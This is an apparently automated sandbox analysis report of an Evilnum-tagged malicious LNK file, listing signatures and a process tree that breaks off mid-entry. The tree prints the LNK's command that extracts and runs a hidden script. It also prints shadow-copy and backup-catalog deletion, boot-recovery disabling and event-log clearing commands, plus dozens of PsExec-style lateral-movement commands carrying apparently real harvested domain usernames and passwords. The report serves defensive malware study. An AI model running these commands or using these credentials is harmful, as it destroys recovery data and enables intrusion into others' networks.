Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    26-12-2020 20:21

General

  • Target

    f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk

  • Size

    938KB

  • MD5

    cb908352d719b9e0a7142c4110ae502e

  • SHA1

    e50a8c33b315517a4bad5eb35fb09e572c3ee9fa

  • SHA256

    f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e

  • SHA512

    9502d7c069532571277e3c8c849e9ce81130a11bf5ad892dad688aa9e53973abc76fb5b53aee72ca37fe29e50aa2543f2681a6d849ada59b9e07ff6e3b574909

Malware Config

Signatures

  • Evilnum

    A malware family with multiple components distributed through LNK files.

  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 155 IoCs
  • Drops file in Windows directory 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 296 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 84 IoCs
  • Suspicious use of WriteProcessMemory 519 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
        3⤵
          PID:3988
        • C:\Windows\system32\find.exe
          find "END2"
          3⤵
            PID:3288
          • C:\Windows\system32\wscript.exe
            wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
            3⤵
              PID:3208
        • C:\Windows\PSEXESVC.exe
          C:\Windows\PSEXESVC.exe
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1352
          • C:\Windows\_ftf.exe
            "_ftf.exe"
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1740
            • C:\Windows\TEMP\vfrkl.exe
              123 \\.\pipe\280E9885-CDBC-4DAE-8FA4-2E26A1A5442E
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:412
            • C:\Windows\TEMP\_umx.exe
              "C:\Windows\TEMP\_umx.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3428
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3980
                • \??\c:\Windows\system32\vssadmin.exe
                  c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:4000
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2164
                • C:\Windows\system32\wbadmin.exe
                  wbadmin.exe delete catalog -quiet
                  5⤵
                  • Deletes backup catalog
                  PID:3568
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                4⤵
                  PID:3732
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3820
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:252
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
                  4⤵
                    PID:4116
                    • C:\Windows\system32\wevtutil.exe
                      wevtutil.exe cl System
                      5⤵
                        PID:4220
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
                      4⤵
                        PID:4448
                        • C:\Windows\system32\wevtutil.exe
                          wevtutil.exe cl Security
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4664
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4088
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:2600
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:3908
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:3060
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.65 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:2672
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:3236
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.94 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:3212
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:1516
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:2632
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:3120
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:892
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:496
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:1860
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:1940
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:2340
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4196
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4208
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4332
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4384
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4424
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4536
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4604
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4716
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4728
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4816
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4828
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4908
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:5024
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:5072
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:1032
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:2916
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:1888
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4152
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4212
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4300
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4308
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4056
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4176
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4360
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4440
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4504
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4596
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4680
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4660
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4784
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4760
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4636
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4856
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4820
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4996
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:5052
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:1196
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:5104
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:3796
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4320
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      PID:4160
                    • C:\Windows\TEMP\_fif.exe
                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                      3⤵
                        PID:4200
                      • C:\Windows\TEMP\_fif.exe
                        C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                        3⤵
                        • Modifies data under HKEY_USERS
                        PID:4260
                      • C:\Windows\TEMP\_fif.exe
                        C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                        3⤵
                          PID:1736
                        • C:\Windows\TEMP\_fif.exe
                          C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                          3⤵
                          • Modifies data under HKEY_USERS
                          PID:4268
                        • C:\Windows\TEMP\_fif.exe
                          C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                          3⤵
                          • Modifies data under HKEY_USERS
                          PID:4164
                        • C:\Windows\TEMP\_fif.exe
                          C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                          3⤵
                          • Modifies data under HKEY_USERS
                          PID:4400
                        • C:\Windows\TEMP\_fif.exe
                          C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                          3⤵
                          • Modifies data under HKEY_USERS
                          PID:4688
                        • C:\Windows\TEMP\_fif.exe
                          C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                          3⤵
                            PID:4532
                          • C:\Windows\TEMP\_fif.exe
                            C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                            3⤵
                              PID:4488
                            • C:\Windows\TEMP\_fif.exe
                              C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                              3⤵
                              • Modifies data under HKEY_USERS
                              PID:4736
                            • C:\Windows\TEMP\_fif.exe
                              C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                              3⤵
                              • Modifies data under HKEY_USERS
                              PID:4812
                            • C:\Windows\TEMP\_fif.exe
                              C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                              3⤵
                                PID:3216
                              • C:\Windows\TEMP\_fif.exe
                                C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                3⤵
                                • Modifies data under HKEY_USERS
                                PID:4872
                              • C:\Windows\TEMP\_fif.exe
                                C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                3⤵
                                  PID:4964
                                • C:\Windows\TEMP\_fif.exe
                                  C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:4836
                                • C:\Windows\TEMP\_fif.exe
                                  C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:5040
                                • C:\Windows\TEMP\_fif.exe
                                  C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:4264
                                • C:\Windows\TEMP\_fif.exe
                                  C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                  3⤵
                                    PID:5108
                                  • C:\Windows\TEMP\_fif.exe
                                    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                    3⤵
                                      PID:2620
                                    • C:\Windows\TEMP\_fif.exe
                                      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                      3⤵
                                        PID:1044
                                      • C:\Windows\TEMP\_fif.exe
                                        C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4220
                                      • C:\Windows\TEMP\_fif.exe
                                        C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                        3⤵
                                          PID:4544
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            4⤵
                                              PID:4116
                                          • C:\Windows\TEMP\_fif.exe
                                            C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                            3⤵
                                            • Modifies data under HKEY_USERS
                                            PID:4592
                                          • C:\Windows\TEMP\_fif.exe
                                            C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                            3⤵
                                            • Modifies data under HKEY_USERS
                                            PID:1388
                                          • C:\Windows\TEMP\_fif.exe
                                            C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                            3⤵
                                              PID:4288
                                            • C:\Windows\TEMP\_fif.exe
                                              C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                              3⤵
                                                PID:4580
                                              • C:\Windows\TEMP\_fif.exe
